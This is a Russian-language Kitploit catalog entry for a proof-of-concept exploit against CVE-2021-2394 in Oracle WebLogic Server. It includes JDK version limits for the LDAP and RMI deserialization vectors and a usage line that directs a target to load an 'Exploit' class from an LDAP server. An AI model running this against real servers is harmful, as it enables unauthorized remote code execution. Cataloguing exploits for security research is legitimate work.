Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-2394 — Эксплойт-доказательство концепции для CVE-2021-2394, уязвимости удаленного выполнения кода в Oracle WebLogic Server. Использует десериализацию LDAP или RMI для доставки нагрузки. | Kitploit
Инструменты/GitHubGitHub/lz2y/cve-2021-2394
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHublz2y/cve-2021-2394

CVE-2021-2394

Эксплойт-доказательство концепции для CVE-2021-2394, уязвимости удаленного выполнения кода в Oracle WebLogic Server. Использует десериализацию LDAP или RMI для доставки нагрузки.

Репозиторий
402014 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-2394

POC для CVE-2021-2394

  • Отказ от ответственности
    • Проект предоставлен только для изучения. Все прямые или косвенные последствия и убытки, причинённые несанкционированным тестированием, несёт сам пользователь.
  • Примечания

    • POC использует отправку пакетов через IIOP, добавьте соответствующие зависимости (зависимости версии 12.2.1.3.0 размещены в release).
    • Для тестирования используйте WebLogic, установленный с более старой версией JDK.

      Метод эксплуатации на основе RMI ограничен версиями JDK до 6u132, 7u131, 8u121; начиная с 8u122 добавлен механизм белого списка десериализации, который отключает удалённую загрузку кода через RMI. Метод эксплуатации на основе LDAP ограничен версиями JDK до 6u211, 7u201, 8u191, 11.0.1; в версии 8u191 Oracle ввёл ограничения для вектора LDAP, выпустил CVE-2018-3149 и отключил удалённую загрузку классов через JNDI. Источник: https://www.freebuf.com/vuls/279465.html

    • Если не удаётся воспроизвести в виртуальной среде, обратитесь к https://xz.aliyun.com/t/7498
  • Использование:

    • Запустите LDAP-сервис.
    • java -jar CVE_2021_2394.jar rhost rport ldapurl
    • Например: java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit
  • Ссылки:

    • https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A
https://github.com/Y4er/CVE-2020-14756
  • https://github.com/Y4er/CVE-2020-2551
  • Обновления

    • 2021/8/15 Удалён ненужный код
  • Аналитическая статья

    • https://mp.weixin.qq.com/s/AxJJxbkclr4ijXX8lpNAfw
  • Скачать инструмент